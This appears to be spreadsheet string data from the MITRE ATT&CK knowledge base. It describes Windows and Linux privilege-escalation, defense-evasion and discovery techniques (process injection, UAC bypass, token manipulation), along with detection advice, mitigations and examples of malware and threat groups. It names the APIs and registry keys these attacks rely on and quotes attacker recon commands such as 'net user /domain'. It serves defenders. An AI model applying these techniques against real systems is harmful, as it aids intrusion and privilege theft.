  <si>
    <t>Defense Evasion,Privilege Escalation</t>
  </si>
  <si>
    <t>Extra Window Memory Injection</t>
  </si>
  <si>
    <t>Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).[[CiteRef::Microsoft Window Classes]] Registration of new windows classes can include a request for up to 40 bytes of extra window memory (EWM) to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value.[[CiteRef::Microsoft GetWindowLong function]][[CiteRef::Microsoft SetWindowLong function]]
Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process?s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process?s EWM.
Execution granted through EWM injection may take place in the address space of a separate live process. Similar to [[Technique/T1055|Process Injection]], this may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.[[CiteRef::Engame Process Injection July 2017]] More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process.[[CiteRef::MalwareTech Power Loader Aug 2013]][[CiteRef::WeLiveSecurity Gapz and Redyms Mar 2013]]</t>
  </si>
  <si>
    <t>Anti-virus,Host intrusion prevention systems,Data Execution Prevention</t>
  </si>
  <si>
    <t>Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong[[CiteRef::Microsoft GetWindowLong function]] and SetWindowLong[[CiteRef::Microsoft SetWindowLong function]]. Malware associated with this technique have also used SendNotifyMessage[[CiteRef::Microsoft SendNotifyMessage function]] to trigger the associated window procedure and eventual malicious injection.[[CiteRef::Engame Process Injection July 2017]] ,</t>
  </si>
  <si>
    <t>This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific API calls will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.
Although EWM injection may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1181</t>
  </si>
  <si>
    <t>Bypass User Account Control</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] can attempt to run the program as admin, then show a fake error message and a legitimate UAC bypass prompt to the user in an attempt to socially engineer the user into escalating privileges.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>System calls,Process monitoring,Authentication logs,Process command-line parameters</t>
  </si>
  <si>
    <t>There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [[Technique/T1055|Process Injection]] and unusual loaded DLLs through [[Technique/T1038|DLL Search Order Hijacking]], which indicate attempts to gain access to higher privileged processes.
Some UAC bypass methods rely on modifying specific, user-accessible Registry settings.  For example:
* The &lt;code&gt;eventvwr.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command&lt;/code&gt; Registry key.[[CiteRef::enigma0x3 Fileless UAC Bypass]]
* The &lt;code&gt;sdclt.exe&lt;/code&gt; bypass uses the &lt;code&gt;[HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe&lt;/code&gt; and &lt;code&gt;[HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand&lt;/code&gt; Registry keys.[[CiteRef::enigma0x3 sdclt app paths]][[CiteRef::enigma0x3 sdclt bypass]]
Analysts should monitor these Registry settings for unauthorized changes. ,</t>
  </si>
  <si>
    <t>Remove users from the local administrator group on systems. Although UAC bypass techniques exist, it is still prudent to use the highest enforcement level for UAC when possible and mitigate bypass opportunities that exist with techniques such as [[Technique/T1038|DLL Search Order Hijacking]]. 
Check for common UAC bypass weaknesses on Windows systems to be aware of the risk posture and address issues where appropriate.[[CiteRef::Github UACMe]]</t>
  </si>
  <si>
    <t>Stefan Kanthak,Casey Smith</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1088</t>
  </si>
  <si>
    <t>[[Software/S0129|AutoIt backdoor]] attempts to escalate privileges by bypassing User Access Control.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>[[Software/S0074|Sakula]] contains UAC bypass code for both 32- and 64-bit systems.[[CiteRef::Dell Sakula]]</t>
  </si>
  <si>
    <t>[[Software/S0089|BlackEnergy]] attempts to bypass default User Access Control (UAC) settings by exploiting a backward-compatibility setting found in Windows 7 and later.[[CiteRef::F-Secure BlackEnergy 2014]]</t>
  </si>
  <si>
    <t>[[Group/G0040|Patchwork]] bypassed User Access Control (UAC).[[CiteRef::Cymmetria Patchwork]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can use a number of known techniques to bypass Windows UAC.[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>[[Group/G0016|APT29]] has bypassed UAC.[[CiteRef::Mandiant No Easy Breach]]</t>
  </si>
  <si>
    <t>Access Token Manipulation</t>
  </si>
  <si>
    <t>Windows uses access tokens to determine the ownership of a running process.  A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process.  When this occurs, the process also takes on the security context associated with the new token.  For example, Microsoft promotes the use of access tokens as a security best practice.  Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command &lt;code&gt;runas&lt;/code&gt;. [[CiteRef::Microsoft runas]]
Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing.  An adversary must already be in a privileged user context (i.e. administrator) to steal a token.  However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.[[CiteRef::Pentestlab Token Manipulation]]
Access tokens can be leveraged by adversaries through three methods:[[CiteRef::BlackHat Atkinson Winchester Token Manipulation]]
'''Token Impersonation/Theft''' - An adversary creates a new access token that duplicates an existing token using &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt;. The token can then be used with &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt; to allow the calling thread to impersonate a logged on user's security context, or with &lt;code&gt;SetThreadToken&lt;/code&gt; to assign the impersonated token to a thread. This is useful for when the target user has a non-network logon session on the system.
'''Create Process with a Token''' - An adversary creates a new access token with &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt; and uses it with &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.
'''Make and Impersonate Token''' - An adversary has a username and password but the user is not logged onto the system. The adversary can then create a logon session for the user using the &lt;code&gt;LogonUser&lt;/code&gt; function. The function will return a copy of the new session's access token and the adversary can use &lt;code&gt;SetThreadToken&lt;/code&gt; to assign the token to a thread.
Any standard user can use the &lt;code&gt;runas&lt;/code&gt; command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account.
Metasploit?s Meterpreter payload allows arbitrary token manipulation and uses token impersonation to escalate privileges. [[CiteRef::Metasploit access token]]  The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens. [[CiteRef::Cobalt Strike Access Token]]</t>
  </si>
  <si>
    <t>API monitoring,Access Tokens</t>
  </si>
  <si>
    <t>If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity.  Specifically, analysts should look for use of the &lt;code&gt;runas&lt;/code&gt; command. Detailed command-line logging is not enabled by default in Windows.[[CiteRef::Microsoft Command-line Logging]]
If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.  
There are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., &lt;code&gt;LogonUser&lt;/code&gt;[[CiteRef::Microsoft LogonUser]], &lt;code&gt;DuplicateTokenEx&lt;/code&gt;[[CiteRef::Microsoft DuplicateTokenEx]], and &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt;[[CiteRef::Microsoft ImpersonateLoggedOnUser]]).  Please see the referenced Windows API pages for more information.
Query systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.[[CiteRef::BlackHat Atkinson Winchester Token Manipulation]] ,</t>
  </si>
  <si>
    <t>Access tokens are an integral part of the security system within Windows and cannot be turned off.  However, an attacker must already have administrator level access on the local system to make full use of this technique; be sure to restrict users and accounts to the least privileges they require to do their job.
Any user can also spoof access tokens if they have legitimate credentials.  Follow mitigation guidelines for preventing adversary use of [[Technique/T1078|Valid Accounts]]. Limit permissions so that users and user groups cannot create tokens. This setting should be defined for the local system account only. GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Create a token object.[[CiteRef::Microsoft Create Token]] Also define who can create a process level token to only the local and network service through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Replace a process level token.[[CiteRef::Microsoft Replace Process Token]]
Also limit opportunities for adversaries to increase privileges by limiting [[Privilege Escalation]] opportunities.</t>
  </si>
  <si>
    <t>Tom Ueltschi @c_APT_ure,Travis Smith, Tripwire,Jared Atkinson, @jaredcatkinson,Robby Winchester, @robwinchester3</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1134</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] malware xxmm contains a UAC bypass tool for privilege escalation.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>Process Injection</t>
  </si>
  <si>
    <t>[[Software/S0012|PoisonIvy]] can load DLLs.[[CiteRef::FireEye Poison Ivy]]</t>
  </si>
  <si>
    <t>API monitoring,Windows Registry,File monitoring,DLL monitoring,Named Pipes,Process Monitoring</t>
  </si>
  <si>
    <t>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API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC, and those that can be used to modify memory within another process, such as WriteProcessMemory, may be used for this technique.[[CiteRef::Engame Process Injection July 2017]]
Monitoring for Linux specific calls such as the ptrace system call, the use of LD_PRELOAD environment variable, or dlfcn dynamic linking API calls, should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods. [[CiteRef::ArtOfMemoryForensics]] [[CiteRef::GNU Acct]] [[CiteRef::RHEL auditd]] [[CiteRef::Chokepoint preload rootkits]]
Monitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules.[[CiteRef::Microsoft Sysmon v6 May 2017]]
Monitor processes and command-line arguments for actions that could be done before or after code injection has occurred and correlate the information with related event information. Code injection may also be performed using [[Technique/T1086|PowerShell]] with tools such as PowerSploit,[[CiteRef::Powersploit]] so additional PowerShell monitoring may be required to cover known implementations of this behavior. ,</t>
  </si>
  <si>
    <t>This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific Windows API calls will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior.[[CiteRef::GDSecurity Linux injection]]
Identify or block potentially malicious software that may contain process injection functionality by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]
Utilize Yama [[CiteRef::Linux kernel Yama]] to mitigate ptrace based process injection by restricting the use of ptrace to privileged users only. Other mitigation controls involve the deployment of security kernel modules that provide advanced access control and process restrictions such as SELinux [[CiteRef::SELinux official]], grsecurity [[CiteRef::grsecurity official]], and AppAmour [[CiteRef::AppArmor official]].</t>
  </si>
  <si>
    <t>User,Administrator,SYSTEM,root</t>
  </si>
  <si>
    <t>Anastasios Pingios</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1055</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can steal access tokens from exiting processes and make tokens from known credentials.[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] has used CVE-2015-1701 to access the SYSTEM token and copy it into the current process as part of privilege escalation.[[CiteRef::FireEye Op RussianDoll]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can inject a variety of payloads into processes dynamically chosen by the adversary.[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>[[Software/S0021|Derusbi]] injects itself into the secure shell (SSH) process.[[CiteRef::Airbus Derusbi 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0135|HIDEDRV]] injects a DLL for [[Software/S0134|Downdelph]] into the explorer.exe process.[[CiteRef::ESET Sednit Part 3]]</t>
  </si>
  <si>
    <t>[[Software/S0044|JHUHUGIT]] performs code injection injecting its own functions to browser processes.[[CiteRef::F-Secure Sofacy 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0089|BlackEnergy]] injects its DLL component into svchost.exe.[[CiteRef::F-Secure BlackEnergy 2014]]</t>
  </si>
  <si>
    <t>Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
===Windows===
There are multiple approaches to injecting code into a live process. Windows implementations include:[[CiteRef::Engame Process Injection July 2017]]
* '''Dynamic-link library (DLL) injection''' involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread.
* '''Portable executable injection''' involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue.[[CiteRef::Endgame HuntingNMemory June 2017]]
* '''Thread execution hijacking''' involves injecting malicious code or the path to a DLL into a thread of a process. Similar to [[Technique/T1093|Process Hollowing]], the thread must first be suspended.
* '''Asynchronous Procedure Call''' (APC) injection involves attaching malicious code to the APC Queue[[CiteRef::Microsoft APC]] of a process's thread. Queued APC functions are executed when the thread enters an alterable state. AtomBombing [[CiteRef::ENSIL AtomBombing Oct 2016]] is a variation that utilizes APCs to invoke malicious code previously written to the global atom table.[[CiteRef::Microsoft Atom Table]]
* '''Thread Local Storage''' (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point.[[CiteRef::FireEye TLS Nov 2017]]
===Mac and Linux===
Implementations for Linux and OS X/macOS systems include:[[CiteRef::Datawire Code Injection]][[CiteRef::Uninformed Needle]]
*'''LD_PRELOAD, LD_LIBRARY_PATH''' (Linux), '''DYLD_INSERT_LIBRARIES''' (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process.[[CiteRef::Phrack halfdead 1997]]
*'''Ptrace system calls''' can be used to attach to a running process and modify it in runtime.[[CiteRef::Uninformed Needle]]
*'''/proc/[pid]/mem''' provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity.[[CiteRef::Uninformed Needle]]
*'''VDSO hijacking''' performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object.[[CiteRef::VDSO hijack 2009]]
Malware commonly utilizes process injection to access system resources through which [[Persistence]] and other environment modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] can perform DLL injection.[[CiteRef::Kaspersky ProjectSauron Technical Analysis]]</t>
  </si>
  <si>
    <t>[[Software/S0168|Gazer]] performs thread execution hijacking to inject its orchestrator into a running thread from a remote process. [[Software/S0168|Gazer]] performs a separate injection of its communication module into an Internet accessible process through which it performs C2.[[CiteRef::ESET Gazer Aug 2017]][[CiteRef::Securelist WhiteBear Aug 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0058|SslMM]] contains a feature to manipulate process privileges and tokens.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] keylogger KiloAlfa obtains user tokens from interactive sessions to execute itself with API call &lt;code&gt;CreateProcessAsUserA&lt;/code&gt; under that user's context.[[CiteRef::Novetta Blockbuster Tools]]</t>
  </si>
  <si>
    <t>An executable dropped onto victims by [[Group/G0024|Putter Panda]] aims to inject the specified DLL into a process that would normally be accessing the network, including Outlook Express (msinm.exe), Outlook (outlook.exe), Internet Explorer (iexplore.exe), and Firefox (firefox.exe).[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>After decrypting itself in memory, [[Software/S0055|RARSTONE]] downloads a DLL file from its C2 server and loads it in the memory space of a hidden Internet Explorer process. This ?downloaded? file is actually not dropped onto the system.[[CiteRef::Camba RARSTONE]]</t>
  </si>
  <si>
    <t>[[Software/S0082|Emissary]] injects its DLL file into a newly spawned Internet Explorer process.[[CiteRef::Lotus Blossom Dec 2015]]</t>
  </si>
  <si>
    <t>Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.[[CiteRef::TechNet How UAC Works]]
If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box.[[CiteRef::TechNet Inside UAC]][[CiteRef::MSDN COM Elevation]] An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.[[CiteRef::Davidson Windows]] Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.
Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods[[CiteRef::Github UACMe]] that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
* &lt;code&gt;eventvwr.exe&lt;/code&gt; can auto-elevate and execute a specified binary or script.[[CiteRef::enigma0x3 Fileless UAC Bypass]][[CiteRef::Fortinet Fareit]]
Another bypass is possible through some [[Lateral Movement]] techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity.[[CiteRef::SANS UAC Bypass]]</t>
  </si>
  <si>
    <t>[[Software/S0093|Backdoor.Oldrea]] injects itself into explorer.exe.[[CiteRef::Symantec Dragonfly]]</t>
  </si>
  <si>
    <t>[[Software/S0081|Elise]] injects DLL files into iexplore.exe.[[CiteRef::Lotus Blossom Jun 2015]]</t>
  </si>
  <si>
    <t>performs multiple process injections to hijack system processes and execute malicious code.[[CiteRef::Microsoft SIR Vol 21]]</t>
  </si>
  <si>
    <t>Discovery</t>
  </si>
  <si>
    <t>File and Directory Discovery</t>
  </si>
  <si>
    <t>identified and extracted all Word documents on a server by using a command containing *.doc and *.docx. The actors also searched for documents based on a specific date range and attempted to identify all installed software on a victim.[[CiteRef::Symantec Sowbug Nov 2017]]</t>
  </si>
  <si>
    <t>System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as [[Collection]] and [[Exfiltration]],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[[Technique/T1047|Windows Management Instrumentation]] and [[Technique/T1086|PowerShell]]. ,</t>
  </si>
  <si>
    <t>File system activity is a common part of an operating system, so it is unlikely that mitigation would be appropriate for this technique. It may still be beneficial to identify and block unnecessary system utilities or potentially malicious software by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Some folders may require Administrator, SYSTEM or specific user depending on permission levels and access controls</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1083</t>
  </si>
  <si>
    <t>[[Software/S0089|BlackEnergy]] gathers a list of installed apps from the uninstall program Registry. It also gathers registered mail, browser, and instant messaging clients from the Registry.[[CiteRef::F-Secure BlackEnergy 2014]] [[Software/S0089|BlackEnergy]] has searched for given file types.[[CiteRef::Securelist BlackEnergy Nov 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0078|Psylo]] has commands to enumerate all storage devices and to find all files that start with a particular string.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0064|ELMER]] is capable of performing directory listings.[[CiteRef::FireEye EPS Awakens Part 2]]</t>
  </si>
  <si>
    <t>[[Software/S0069|BLACKCOFFEE]] has the capability to enumerate files.[[CiteRef::FireEye APT17]]</t>
  </si>
  <si>
    <t>[[Software/S0072|OwaAuth]] has a command to list its directory and logical drives.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>[[Software/S0070|HTTPBrowser]] is capable of listing files, folders, and drives on a victim.[[CiteRef::Dell TG-3390]][[CiteRef::ZScaler Hacking Team]]</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] is capable of listing contents of folders on the victim.[[CiteRef::Symantec Remsec IOCs]][[CiteRef::Kaspersky ProjectSauron Technical Analysis]] [[Software/S0125|Remsec]] also searches for custom network encryption software on victims.[[CiteRef::Kaspersky ProjectSauron Full Report]]</t>
  </si>
  <si>
    <t>[[Software/S0124|Pisloader]] has commands to list drives on the victim machine and to list file information for a given directory.[[CiteRef::Palo Alto DNS Requests]]</t>
  </si>
  <si>
    <t>[[Software/S0079|MobileOrder]] has a command to upload to its C2 server information about files on the victim mobile device, including SD card size, installed app list, browser bookmarks, SMS content, contacts, and calling history.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0010|Turla]] surveys a system upon check-in to discover files in specific locations on the hard disk %TEMP% directory, the current user's desktop, and in the Program Files directory.[[CiteRef::Kaspersky Turla]]</t>
  </si>
  <si>
    <t>[[Group/G0018|admin@338]] actors used the following commands after exploiting a machine with [[Software/S0042|LOWBALL]] malware to obtain information about files and directories: &lt;code&gt;dir c:\ &gt;&gt; %temp%\download&lt;/code&gt; &lt;code&gt;dir "c:\Documents and Settings" &gt;&gt; %temp%\download&lt;/code&gt; &lt;code&gt;dir "c:\Program Files\" &gt;&gt; %temp%\download&lt;/code&gt; &lt;code&gt;dir d:\ &gt;&gt; %temp%\download&lt;/code&gt;[[CiteRef::FireEye admin@338]]</t>
  </si>
  <si>
    <t>Account Discovery</t>
  </si>
  <si>
    <t>[[Software/S0049|GeminiDuke]] collects information on local user accounts from the victim.[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>API monitoring,Process command-line parameters,Process monitoring</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</si>
  <si>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[[Technique/T1047|Windows Management Instrumentation]] and [[Technique/T1086|PowerShell]]. ,</t>
  </si>
  <si>
    <t>Prevent administrator accounts from being enumerated when an application is elevating through UAC since it can lead to the disclosure of account names. The Registry key is located &lt;code&gt;HKLM\ SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\CredUI\EnumerateAdministrators&lt;/code&gt;. It can be disabled through GPO: Computer Configuration &gt; [Policies] &gt; Administrative Templates &gt; Windows Components &gt; Credential User Interface: E numerate administrator accounts on elevation.[[CiteRef::UCF STIG Elevation Account Enumeration]]
Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system and domain accounts, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1087</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] has used a tool that can obtain info about local and global group users, power users, and administrators.[[CiteRef::Symantec Buckeye]]</t>
  </si>
  <si>
    <t>Commands under &lt;code&gt;net user&lt;/code&gt; can be used in [[Software/S0039|Net]] to gather information about and manipulate user accounts.[[CiteRef::Savill 1999]]</t>
  </si>
  <si>
    <t>[[Software/S0063|SHOTPUT]] has a command to retrieve information about connected users.[[CiteRef::Palo Alto CVE-2015-3113 July 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0184|POWRUNER]] may collect user account information by running &lt;code&gt;net user /domain&lt;/code&gt; or a series of other commands on a victim.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] has used &lt;code&gt;net user /domain&lt;/code&gt; to identify account information.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>Software: OSInfo</t>
  </si>
  <si>
    <t>enumerates local and domain users [[CiteRef::Symantec Buckeye]]</t>
  </si>
  <si>
    <t>[[Group/G0018|admin@338]] actors used the following commands following exploitation of a machine with [[Software/S0042|LOWBALL]] malware to enumerate user accounts: &lt;code&gt;net user &gt;&gt; %temp%\download&lt;/code&gt; &lt;code&gt;net user /domain &gt;&gt; %temp%\download&lt;/code&gt;[[CiteRef::FireEye admin@338]]</t>
  </si>
  <si>
    <t>System Information Discovery</t>
  </si>
  <si>
    <t>A [[Group/G0047|Gamaredon Group]] file stealer can gather the victim's computer name and drive serial numbers to send to a C2 server.[[CiteRef::Palo Alto Gamaredon Feb 2017]]</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities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[[Technique/T1047|Windows Management Instrumentation]] and [[Technique/T1086|PowerShell]]. ,</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about the operating system and underlying hardware,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</si>
  <si>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https://attack.mitre.org/wiki/Technique/T1082</t>
  </si>
  <si>
    <t>[[Group/G0038|Stealth Falcon]] malware gathers system information via WMI, including the system directory, build number, serial number, version, manufacturer, model, and total physical memory.[[CiteRef::Citizen Lab Stealth Falcon May 2016]]</t>
  </si>
  <si>
    <t>Software: Systeminfo, systeminfo.exe</t>
  </si>
  <si>
    <t>[[Software/S0096|Systeminfo]] can be used to gather information about the operating system.[[CiteRef::TechNet Systeminfo]]</t>
  </si>
  <si>
    <t>[[Group/G0010|Turla]] surveys a system upon check-in to discover operating system configuration details using the &lt;code&gt;systeminfo&lt;/code&gt; and &lt;code&gt;set&lt;/code&gt; commands.[[CiteRef::Kaspersky Turla]]</t>
  </si>
  <si>
    <t>collects the system information, including hostname and OS version, and sends it to the C2 server.[[CiteRef::Forcepoint Felismus Mar 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0089|BlackEnergy]] has used [[Software/S0096|Systeminfo]] to gather the OS version, as well as information on the system configuration, BIOS, the motherboard, and the processor.[[CiteRef::F-Secure BlackEnergy 2014]] [[CiteRef::Securelist BlackEnergy Nov 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] can obtain the computer name, OS version, and default language identifier.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>obtained OS version and hardware configuration from a victim.[[CiteRef::Symantec Sowbug Nov 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0079|MobileOrder]] has a command to upload to its C2 server victim mobile device information, including IMEI, IMSI, SIM card serial number, phone number, Android version, and other information.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0106|cmd]] can be used to find files and directories with native functionality such as &lt;code&gt;dir&lt;/code&gt; commands.[[CiteRef::TechNet Dir]]</t>
  </si>
  <si>
    <t>[[Group/G0031|Dust Storm]] has used Android backdoors capable of enumerating specific files on the infected devices.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0093|Backdoor.Oldrea]] collects information about available drives, default browser, desktop file list, My Documents, Internet history, program files, and root of available drives. It also searches for ICS-related software files.[[CiteRef::Symantec Dragonfly]]</t>
  </si>
  <si>
    <t>[[Software/S0083|Misdat]] is capable of running commands to obtain a list of files and directories, as well as enumerating logical drives.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0147|Pteranodon]] identifies files matching certain file extension and copies them to subdirectories it created.[[CiteRef::Palo Alto Gamaredon Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0086|ZLib]] has the ability to enumerate files and drives.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0142|StreamEx]] has the ability to enumerate drive types.[[CiteRef::Cylance Shell Crew Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0021|Derusbi]] is capable of obtaining a directory listing.[[CiteRef::Fidelis Turbo]]</t>
  </si>
  <si>
